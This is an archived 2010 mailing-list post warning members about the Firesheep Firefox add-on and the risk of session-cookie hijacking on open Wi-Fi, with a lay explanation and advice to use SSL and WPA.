[access-uk] Fire Sheep - Security Alert

• From: "Barry Toner" <barry@xxxxxxxxxxxxxxxxx>
• To: <access-uk@xxxxxxxxxxxxx>
• Date: Sun, 31 Oct 2010 09:45:00 -0000

Hi,
I apologise for the slap-dash manner of this mail.  However, this is truly
vital and worrying.  So much so I got up out of my nice warm comfortable bed
to make as many of you aware as possible.  Sounds like scaremongering
language?  Read-on.
I've just learned about this.  It is major, major, majorly worrying and must
be addressed.

I am going to attempt to explain in a, (hopefully),  straight forward manner
and will post links below for you to read up about this more.

Allot of folks, (including myself), for years and years have been aware of
security vunrabilitys concerning what is called Session Cookies.  In
particular Session Cookies that are sent from a web site not using any form
of SSL encryption.  That is any form of protection for you while you do your
thing on the net.

It boils down like this.  If you log into say, your Facebook account.  When
you log-in your username and password is sent to Facebook through a secure
connection.  However, once that authentication has taken place, (once
Facebook confirms you've supplied the correct username/password you and
let's you in) the site then goes back into a non-secure mode.  Facebook (in
my example), puts a cookie file onto your machine.  The cookie is just a
text file with some information relating to that time you are on the site.  

Where this becomes a problem is if you are on an Internet connection that is
not secure that information is being sent un-encrypted or in an easy to see
format.  So easy that a plug-in has been developed for the Firefox
Web-Browser to show exactly how "Out there" your personal details can be.
Below is a Youtube video (that has decent dialog), demoing this plug-ins
capabilitys.  In a nutshell using this plug-in you can view other people who
are connected to your Wireless network and what they are up to on selective
websites.  Not only view in-fact hi-jack that Facebook/Twitter/etc session.
So you can log-in and act as if you are that person.

This becomes doubly serious when used in an area where Free or Open WIFI is
used.  That is a WIFI connection that does not prompt for a password or
other form of authentication.  EG.  Starbucks, a Library, an Airport, or
your own home WIFI connection if you have just left it opened.  Using this
plug-in for Firefox you can do all of the above to any peoples Facebook etc
accounts.  You used to have to use some crypto stuff in Linux to do this.
But this concept plug-in demonstrates nicely how serious this (un-encrypted
problem), really is.

On sites like Facebook etc they should pull their fingers out and use SSL
Encryption throughout your session (or time) when logged in.  At home and in
your Business/coffee shop etc they should not be using Open WIFI but
something like WPA to help protect themselves from legal recourse and their
customers privacys.  

Furhter information here

Youtube demo - Hijack Facebook, Myspace, Twitter and more!
http://is.gd/gw1zW

Security Now where I first heard about the Firesheep plug-in for Firefox.
" Firesheep
After catching up with a very busy week of security-related news and events,
Steve
and Leo celebrate the game-changing creation and release of "Firesheep", an
add-on
for the Firefox web browser which makes online web session hijacking as easy
as it
could possibly be. This WILL change the world for the better."
https://www.grc.com/securitynow.htm
Text transcript of the show and various mp3s can be had there.

A good BLOG entry that includes snippits from an interview with the guy who
wrote the plug-in and explains nicely what I and others are in such of a
flap over.
Firesheep In Wolves? Clothing: Extension Lets You Hack Into Twitter,
Facebook Accounts
Easily
http://techcrunch.com/2010/10/24/firesheep-in-wolves-clothing-app-lets-you-h
ack-into-twitter-facebook-accounts-easily/



Barry Toner
Microsoft Certified Professional Technology Specialist (MCTS)

BCS Belfast Branch
YPG Representative & Disability Group
http://www.bcs.org/server.php?show=nav.10444

Contact me @
Professional:  barry.toner@xxxxxxxxxx
Personal Email:  barry@xxxxxxxxxxxxxxxxx
MSN/Live:  djpaddy@xxxxxxxxxxxxx
AIM/FB:  barry@xxxxxxxxxxxxxxxxx
TWITTER: dj_paddy
Skype:  djpaddy
Mobile:  (UK) +44 (0) 7921 611 253



** To leave the list, click on the immediately-following link:-
** [mailto:access-uk-request@xxxxxxxxxxxxx?subject=unsubscribe]
** If this link doesn't work then send a message to:
** access-uk-request@xxxxxxxxxxxxx
** and in the Subject line type
** unsubscribe
** For other list commands such as vacation mode, click on the
** immediately-following link:-
** [mailto:access-uk-request@xxxxxxxxxxxxx?subject=faq]
** or send a message, to
** access-uk-request@xxxxxxxxxxxxx with the Subject:- faq

• Follow-Ups:
  • [access-uk] Re: Fire Sheep - Security Alert
    • From: Barry Toner

Other related posts:

• » [access-uk] Fire Sheep - Security Alert - Barry Toner
• » [access-uk] Re: Fire Sheep - Security Alert - Barry Toner

• » Related posts
• » Previous by Date
• » Next by Date
• » This Month's Archive
• » Main Archive Page
• » View list details
• » Manage your subscription